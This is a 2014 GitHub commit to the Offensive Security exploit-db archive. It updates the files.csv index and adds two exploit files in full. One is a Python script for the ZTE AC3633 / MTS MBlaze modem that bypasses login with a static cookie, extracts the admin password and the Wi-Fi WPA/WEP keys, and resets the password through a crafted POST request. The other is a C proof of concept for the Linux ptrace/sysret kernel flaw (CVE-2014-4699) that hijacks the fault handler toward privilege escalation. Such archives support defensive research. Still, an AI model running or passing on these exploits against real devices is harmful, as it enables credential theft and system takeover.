Skip to content

Commit 2ea55e4

Browse files
author
Offensive Security
committed
Updated 07_23_2014
1 parent b98d024 commit 2ea55e4

14 files changed

Lines changed: 1989 additions & 1 deletion

File tree

files.csv

Lines changed: 14 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -16855,7 +16855,7 @@ id,file,description,date,author,platform,type,port
1685516855
19521,platforms/windows/remote/19521.txt,"MS IE 5.0/4.0.1 hhopen OLE Control Buffer Overflow Vulnerability",1999-09-27,"Shane Hird",windows,remote,0
1685616856
19522,platforms/linux/remote/19522.txt,"Linux kernel 2.2 Predictable TCP Initial Sequence Number Vulnerability",1999-09-27,"Stealth and S. Krahmer",linux,remote,0
1685716857
19523,platforms/linux/local/19523.txt,"python-wrapper Untrusted Search Path/Code Execution Vulnerability",2012-07-02,ShadowHatesYou,linux,local,0
16858-
19524,platforms/php/webapps/19524.txt,"WordPress Backup Plugin 2.0.1 Information Disclosure",2012-07-02,"Stephan Knauss",php,webapps,0
16858+
19524,platforms/php/webapps/19524.txt,"WordPress Backup Plugin 2.0.1 - Information Disclosure",2012-07-02,"Stephan Knauss",php,webapps,0
1685916859
19525,platforms/windows/webapps/19525.txt,"IIS Short File/Folder Name Disclosure",2012-07-02,"Soroush Dalili",windows,webapps,0
1686016860
19526,platforms/hardware/webapps/19526.rb,"WANGKONGBAO CNS-1000 UTM IPS-FW Directory Traversal",2012-07-02,"Dillon Beresford",hardware,webapps,0
1686116861
19528,platforms/windows/local/19528.txt,"MS IE 4.1/5.0 Registration Wizard Buffer Overflow",1999-09-27,"Shane Hird",windows,local,0
@@ -30481,6 +30481,7 @@ id,file,description,date,author,platform,type,port
3048130481
33833,platforms/php/webapps/33833.txt,"Blog System 1.x Multiple Input Validation Vulnerabilities",2010-04-12,"cp77fk4r ",php,webapps,0
3048230482
33834,platforms/php/webapps/33834.txt,"Vana CMS 'filename' Parameter Remote File Download Vulnerability",2010-04-13,"Pouya Daneshmand",php,webapps,0
3048330483
33835,platforms/php/webapps/33835.txt,"AneCMS 1.0 Multiple Local File Include Vulnerabilities",2010-04-12,"AmnPardaz Security Research Team",php,webapps,0
30484+
33836,platforms/windows/shellcode/33836.txt,"Windows All Versions - Add Admin User Shellcode (194 bytes)",2014-06-22,"Giuseppe D'Amore",windows,shellcode,0
3048430485
33838,platforms/windows/dos/33838.py,"Mocha W32 LPD 1.9 Remote Buffer Overflow Vulnerability",2010-04-15,mr_me,windows,dos,0
3048530486
33839,platforms/multiple/remote/33839.txt,"Oracle E-Business Suite Financials 12 'jtfwcpnt.jsp' SQL Injection Vulnerability",2010-04-15,"Joxean Koret",multiple,remote,0
3048630487
33840,platforms/asp/webapps/33840.txt,"Ziggurrat Farsi CMS 'bck' Parameter Directory Traversal Vulnerability",2010-04-15,"Pouya Daneshmand",asp,webapps,0
@@ -30631,6 +30632,7 @@ id,file,description,date,author,platform,type,port
3063130632
34007,platforms/php/webapps/34007.txt,"Dolibarr CMS 3.5.3 - Multiple Security Vulnerabilities",2014-07-08,"Deepak Rathore",php,webapps,0
3063230633
34008,platforms/php/webapps/34008.txt,"Percha Multicategory Article Component 0.6 for Joomla! index.php controller Parameter Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0
3063330634
34009,platforms/windows/remote/34009.rb,"Yokogawa CS3000 BKFSim_vhfd.exe Buffer Overflow",2014-07-08,metasploit,windows,remote,20010
30635+
34010,platforms/win32/dos/34010.html,"Internet Explorer 9/10 - CFormElement Use-After-Free and Memory Corruption PoC (MS14-035)",2014-07-08,"Drozdova Liudmila",win32,dos,0
3063430636
34011,platforms/php/webapps/34011.txt,"Shopzilla Affiliate Script PHP 'search.php' Cross Site Scripting Vulnerability",2010-05-19,"Andrea Bocchetti",php,webapps,0
3063530637
34012,platforms/php/webapps/34012.txt,"Caucho Resin Professional 3.1.5 'resin-admin/digest.php' Multiple Cross Site Scripting Vulnerabilities",2010-05-19,xuanmumu,php,webapps,0
3063630638
34013,platforms/windows/remote/34013.txt,"McAfee Email Gateway 6.7.1 'systemWebAdminConfig.do' Remote Security Bypass Vulnerability",2010-05-19,"Nahuel Grisolia",windows,remote,0
@@ -30644,6 +30646,7 @@ id,file,description,date,author,platform,type,port
3064430646
34023,platforms/php/webapps/34023.txt,"Lisk CMS 4.4 'id' Parameter Multiple Cross Site Scripting and SQL Injection Vulnerabilities",2010-05-20,"High-Tech Bridge SA",php,webapps,0
3064530647
34024,platforms/php/webapps/34024.txt,"Triburom 'forum.php' Cross Site Scripting Vulnerability",2010-01-15,"ViRuSMaN ",php,webapps,0
3064630648
34025,platforms/php/webapps/34025.txt,"C99.php Shell - Authentication Bypass",2014-07-10,Mandat0ry,php,webapps,0
30649+
34026,platforms/linux/remote/34026.py,"OpenVAS Manager 4.0 - Authentication Bypass Vulnerability PoC",2014-07-10,EccE,linux,remote,0
3064730650
34027,platforms/solaris/dos/34027.txt,"Sun Solaris 10 Nested Directory Tree Local Denial of Service Vulnerability",2010-05-21,"Maksymilian Arciemowicz",solaris,dos,0
3064830651
34028,platforms/solaris/dos/34028.txt,"Sun Solaris 10 'in.ftpd' Long Command Handling Security Vulnerability",2010-05-21,"Maksymilian Arciemowicz",solaris,dos,0
3064930652
34029,platforms/php/webapps/34029.txt,"Specialized Data Systems Parent Connect 2010.04.11 Multiple SQL Injection Vulnerabilities",2010-05-21,epixoip,php,webapps,0
@@ -30709,12 +30712,14 @@ id,file,description,date,author,platform,type,port
3070930712
34100,platforms/php/webapps/34100.txt,"Omeka 2.2 - CSRF And Stored XSS Vulnerability",2014-07-17,LiquidWorm,php,webapps,80
3071030713
34102,platforms/linux/dos/34102.py,"ACME micro_httpd - Denial of Service",2014-07-18,"Yuval tisf Nativ",linux,dos,80
3071130714
34103,platforms/cgi/webapps/34103.txt,"Barracuda Networks Message Archiver 650 - Persistent XSS Vulnerability",2014-07-18,Vulnerability-Lab,cgi,webapps,3378
30715+
34105,platforms/php/webapps/34105.txt,"Wordpress Plugin Gallery Objects 0.4 - SQL Injection",2014-07-18,"Claudio Viviani",php,webapps,80
3071230716
34106,platforms/php/webapps/34106.txt,"cPanel 11.25 Image Manager 'target' Parameter Local File Include Vulnerability",2010-06-07,"AnTi SeCuRe",php,webapps,0
3071330717
34107,platforms/php/webapps/34107.txt,"boastMachine 3.1 'key' Parameter Cross Site Scripting Vulnerability",2010-06-07,"High-Tech Bridge SA",php,webapps,0
3071430718
34108,platforms/java/webapps/34108.txt,"PRTG Traffic Grapher 6.2.1 'url' Parameter Cross Site Scripting Vulnerability",2009-01-08,"Patrick Webster",java,webapps,0
3071530719
34109,platforms/php/webapps/34109.html,"log1 CMS 2.0 Session Handling Remote Security Bypass and Remote File Include Vulnerabilities",2010-06-03,"High-Tech Bridge SA",php,webapps,0
3071630720
34110,platforms/php/webapps/34110.txt,"PG Auto Pro SQL Injection and Cross Site Scripting Vulnerabilities",2010-06-09,Sid3^effects,php,webapps,0
3071730721
34111,platforms/multiple/webapps/34111.txt,"GREEZLE - Global Real Estate Agent Login Multiple SQL Injection Vulnerabilities",2010-06-09,"L0rd CrusAd3r",multiple,webapps,0
30722+
34112,platforms/windows/local/34112.txt,"Microsoft XP SP3 MQAC.sys - Arbitrary Write Privilege Escalation",2014-07-19,KoreLogic,windows,local,0
3071830723
34113,platforms/php/webapps/34113.py,"SilverStripe CMS 2.4 File Renaming Security Bypass Vulnerability",2010-06-09,"John Leitch",php,webapps,0
3071930724
34114,platforms/php/webapps/34114.txt,"Joomla! JReservation Component Cross Site Scripting Vulnerability",2010-06-09,Sid3^effects,php,webapps,0
3072030725
34115,platforms/windows/remote/34115.txt,"McAfee Unified Threat Management Firewall 4.0.6 'page' Parameter Cross Site Scripting Vulnerability",2010-06-07,"Adam Baldwin",windows,remote,0
@@ -30724,5 +30729,13 @@ id,file,description,date,author,platform,type,port
3072430729
34119,platforms/php/webapps/34119.txt,"Bits Video Script 2.04/2.05 addvideo.php File Upload Arbitrary PHP Code Execution",2010-01-18,indoushka,php,webapps,0
3072530730
34120,platforms/php/webapps/34120.txt,"Bits Video Script 2.04/2.05 register.php File Upload Arbitrary PHP Code Execution",2010-01-18,indoushka,php,webapps,0
3072630731
34121,platforms/php/webapps/34121.txt,"Bits Video Script 2.04/2.05 'search.php' Cross Site Scripting Vulnerability",2010-01-18,indoushka,php,webapps,0
30732+
34124,platforms/php/webapps/34124.txt,"Wordpress WP BackupPlus - Database And Files Backup Download (0day)",2014-07-20,pSyCh0_3D,php,webapps,0
3072730733
34126,platforms/windows/remote/34126.txt,"Microsoft Help and Support Center 'sysinfo/sysinfomain.htm' Cross Site Scripting Weakness",2010-06-10,"Tavis Ormandy",windows,remote,0
3072830734
34127,platforms/php/webapps/34127.txt,"Arab Portal 2.2 'members.php' SQL Injection Vulnerability",2010-06-10,SwEET-DeViL,php,webapps,0
30735+
34128,platforms/hardware/webapps/34128.py,"MTS MBlaze Ultra Wi-Fi / ZTE AC3633 - Multiple Vulnerabilities",2014-07-21,"Ajin Abraham",hardware,webapps,80
30736+
34129,platforms/windows/dos/34129.txt,"World Of Warcraft 3.3.5a (macros-cache.txt) - Stack Overflow",2014-07-21,"Alireza Chegini",windows,dos,0
30737+
34130,platforms/linux/webapps/34130.rb,"Raritan PowerIQ 4.1.0 - SQL Injection Vulnerability",2014-07-21,"Brandon Perry",linux,webapps,80
30738+
34132,platforms/php/remote/34132.txt,"IBM GCM16/32 1.20.0.22575 - Multiple Vulnerabilities",2014-07-21,"Alejandro Alvarez Bravo",php,remote,443
30739+
34133,platforms/linux/dos/34133.txt,"Apache 2.4.7 mod_status Scoreboard Handling Race Condition",2014-07-21,"Marek Kroemeke",linux,dos,0
30740+
34134,platforms/lin_amd64/local/34134.c,"Linux Kernel ptrace/sysret - Local Privilege Escalation",2014-07-21,"Vitaly Nikolenko",lin_amd64,local,0
30741+
34135,platforms/windows/dos/34135.py,"DjVuLibre <= 3.5.25.3 - Out of Bounds Access Violation",2014-07-22,drone,windows,dos,0
Lines changed: 81 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,81 @@
1+
#Author: Ajin Abraham - xboz
2+
#http://opensecurity.in
3+
#Product MTS MBlaze 3G Wi-Fi Modem
4+
#System Version 107
5+
#Manufacturer ZTE
6+
#Model AC3633
7+
import requests
8+
import os
9+
import urllib2
10+
print "MTS MBlaze Ultra Wi-Fi / ZTE AC3633 Exploit"
11+
print "Vulnerabilities"
12+
print "Login Bypass | Router Credential Stealing | Wi-Fi Password Stealing | CSRF | Reset Password without old password and Session\n"
13+
url='http://192.168.1.1'
14+
def find_between( s, first, last ):
15+
try:
16+
start = s.index( first ) + len( first )
17+
end = s.index( last, start )
18+
return s[start:end]
19+
except ValueError:
20+
return ""
21+
#Vulnerable Static Cookies
22+
cookies = dict(iusername='logined')
23+
#Login Bypass
24+
login_url = url+'/en/index.asp'
25+
print "\nAttempting Login :"+url
26+
print '================='
27+
try:
28+
response=urllib2.urlopen(url,timeout=1)
29+
except:
30+
print "Cannot Reach : "+url
31+
exit
32+
r = requests.get(login_url, cookies=cookies)
33+
print 'Status : ' + str(r.status_code)
34+
if "3g.asp" in r.text:
35+
print "Login Sucessfull!"
36+
#Information Gathering
37+
print "\nInformation"
38+
print "========="
39+
info_url=url+'/en/3g.asp'
40+
i= requests.get(info_url, cookies=cookies)
41+
ip=find_between(i.text,'"g3_ip" disabled="disabled" style="background:#ccc;" size="16" maxlength="15" value="','"></td>')
42+
subnet =find_between(i.text,'"g3_mask" disabled="disabled" style="background:#ccc;" size="16" maxlength="15" value="','"></td>')
43+
gateway=find_between(i.text,'"g3_gw" disabled="disabled" style="background:#ccc;" size="16" maxlength="15" value="','"></td>')
44+
print "IP : " +ip
45+
print "Subnet : "+subnet
46+
print "Gateway : " +gateway
47+
#Steal Login Password
48+
print "\nStealing Router Login Credentials"
49+
print "======================"
50+
login_pwd_url=url+'/en/password.asp'
51+
p = requests.get(login_pwd_url, cookies=cookies)
52+
print 'Status : ' + str(p.status_code)
53+
print 'Username : admin' #default
54+
passwd=find_between(p.text,'id="sys_password" value="','"/>')
55+
print 'Password : '+ passwd
56+
print '\nExtracting WPA/WPA2 PSK Key'
57+
print '================='
58+
#Wi-Fi Password Extraction
59+
wifi_pass_url=url+'/en/wifi_security.asp'
60+
s = requests.get(wifi_pass_url, cookies=cookies)
61+
print 'Status: ' + str(s.status_code)
62+
wpa=find_between(s.text,"wpa_psk_key]').val('","');")
63+
wep=find_between(s.text,"wep_key]').val('","');")
64+
print "WPA/WPA2 PSK : " + wpa
65+
print "WEP Key : " + wep
66+
67+
print "\nOther Vulnerabilities"
68+
print "======================="
69+
print "\n1.Cross Site Request Forgery in:\n\nhttp://192.168.1.1/en/dhcp_reservation.asp\nhttp://192.168.1.1/en/mac_filter.asp \nhttp://192.168.1.1/en/password.asp"
70+
print "\n2.Password Reset without old password and Session"
71+
print """
72+
POST /goform/formSyWebCfg HTTP/1.1
73+
Host: 192.168.1.1
74+
Content-Type: application/x-www-form-urlencoded
75+
Referer: http://192.168.1.1/en/password.asp
76+
Accept-Encoding: gzip,deflate,sdch
77+
Accept-Language: en-US,en;q=0.8,es;q=0.6,ms;q=0.4
78+
Content-Length: 52
79+
80+
action=Apply&sys_cfg=changed&sys_password=mblazetestpassword
81+
"""

platforms/lin_amd64/local/34134.c

Lines changed: 125 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,125 @@
1+
/**
2+
* CVE-2014-4699 ptrace/sysret PoC
3+
* by Vitaly Nikolenko
4+
* vnik@hashcrack.org
5+
*
6+
* > gcc -O2 poc_v0.c
7+
*
8+
* This code is kernel specific. On Ubuntu 12.04.0 LTS (3.2.0-23-generic), the
9+
* following will trigger the #GP in sysret and overwrite the #PF handler so we
10+
* can land to our NOP sled mapped at 0x80000000.
11+
* However, once landed, the IDT will be trashed. We can either attempt to
12+
* restore it (then escalate privileges and execute our shellcode) or find
13+
* something else to overwrite that would transfer exec flow to our controlled
14+
* user-space address. Since 3.10.something, IDT is read-only anyway. If you
15+
* have any ideas, let me know.
16+
*/
17+
18+
#include <stdio.h>
19+
#include <stdint.h>
20+
#include <assert.h>
21+
#include <sys/ptrace.h>
22+
#include <sys/types.h>
23+
#include <sys/wait.h>
24+
#include <sys/syscall.h>
25+
#include <sys/user.h>
26+
#include <unistd.h>
27+
#include <sys/mman.h>
28+
#include <errno.h>
29+
30+
#define SIZE 0x10000000
31+
32+
typedef int __attribute__((regparm(3))) (*commit_creds_fn)(unsigned long cred);
33+
typedef unsigned long __attribute__((regparm(3))) (*prepare_kernel_cred_fn)(unsigned long cred);
34+
35+
unsigned long __user_cs;
36+
unsigned long __user_ss;
37+
unsigned long __user_rflags;
38+
39+
void __attribute__((regparm(3))) payload() {
40+
uint32_t *fixptr = (void*)0xffffffff81dd70e8;
41+
// restore the #PF handler
42+
*fixptr = -1;
43+
//commit_creds_fn commit_creds = (commit_creds_fn)0xffffffff81091630;
44+
//prepare_kernel_cred_fn prepare_kernel_cred = (prepare_kernel_cred_fn)0xffffffff810918e0;
45+
//commit_creds(prepare_kernel_cred((uint64_t)NULL));
46+
47+
//__asm__ volatile ("swapgs\n\t"
48+
// "...");
49+
}
50+
51+
int main() {
52+
struct user_regs_struct regs;
53+
uint8_t *trampoline, *tmp;
54+
int status;
55+
56+
struct {
57+
uint16_t limit;
58+
uint64_t addr;
59+
} __attribute__((packed)) idt;
60+
61+
// MAP_POPULATE so we don't trigger extra #PF
62+
trampoline = mmap(0x80000000, SIZE, 7|PROT_EXEC|PROT_READ|PROT_WRITE, 0x32|MAP_FIXED|MAP_POPULATE|MAP_GROWSDOWN, 0,0);
63+
assert(trampoline == 0x80000000);
64+
memset(trampoline, 0x90, SIZE);
65+
tmp = trampoline;
66+
tmp += SIZE-1024;
67+
memcpy(tmp, &payload, 1024);
68+
memcpy(tmp-13,"\x0f\x01\xf8\xe8\5\0\0\0\x0f\x01\xf8\x48\xcf", 13);
69+
70+
pid_t chld;
71+
72+
if ((chld = fork()) < 0) {
73+
perror("fork");
74+
exit(1);
75+
}
76+
77+
if (chld == 0) {
78+
if (ptrace(PTRACE_TRACEME, 0, 0, 0) != 0) {
79+
perror("PTRACE_TRACEME");
80+
exit(1);
81+
}
82+
raise(SIGSTOP);
83+
fork();
84+
return 0;
85+
}
86+
87+
asm volatile("sidt %0" : "=m" (idt));
88+
printf("IDT addr = 0x%lx\n", idt.addr);
89+
90+
waitpid(chld, &status, 0);
91+
92+
ptrace(PTRACE_SETOPTIONS, chld, 0, PTRACE_O_TRACEFORK);
93+
94+
ptrace(PTRACE_CONT, chld, 0, 0);
95+
96+
waitpid(chld, &status, 0);
97+
98+
ptrace(PTRACE_GETREGS, chld, NULL, &regs);
99+
regs.rdi = 0x0000000000000000;
100+
regs.rip = 0x8fffffffffffffff;
101+
regs.rsp = idt.addr + 14*16 + 8 + 0xb0 - 0x78;
102+
103+
// attempt to restore the IDT
104+
regs.rdi = 0x0000000000000000;
105+
regs.rsi = 0x81658e000010cbd0;
106+
regs.rdx = 0x00000000ffffffff;
107+
regs.rcx = 0x81658e000010cba0;
108+
regs.rax = 0x00000000ffffffff;
109+
regs.r8 = 0x81658e010010cb00;
110+
regs.r9 = 0x00000000ffffffff;
111+
regs.r10 = 0x81668e0000106b10;
112+
regs.r11 = 0x00000000ffffffff;
113+
regs.rbx = 0x81668e0000106ac0;
114+
regs.rbp = 0x00000000ffffffff;
115+
regs.r12 = 0x81668e0000106ac0;
116+
regs.r13 = 0x00000000ffffffff;
117+
regs.r14 = 0x81668e0200106a90;
118+
regs.r15 = 0x00000000ffffffff;
119+
120+
ptrace(PTRACE_SETREGS, chld, NULL, &regs);
121+
122+
ptrace(PTRACE_CONT, chld, 0, 0);
123+
124+
ptrace(PTRACE_DETACH, chld, 0, 0);
125+
}

0 commit comments

Comments
 (0)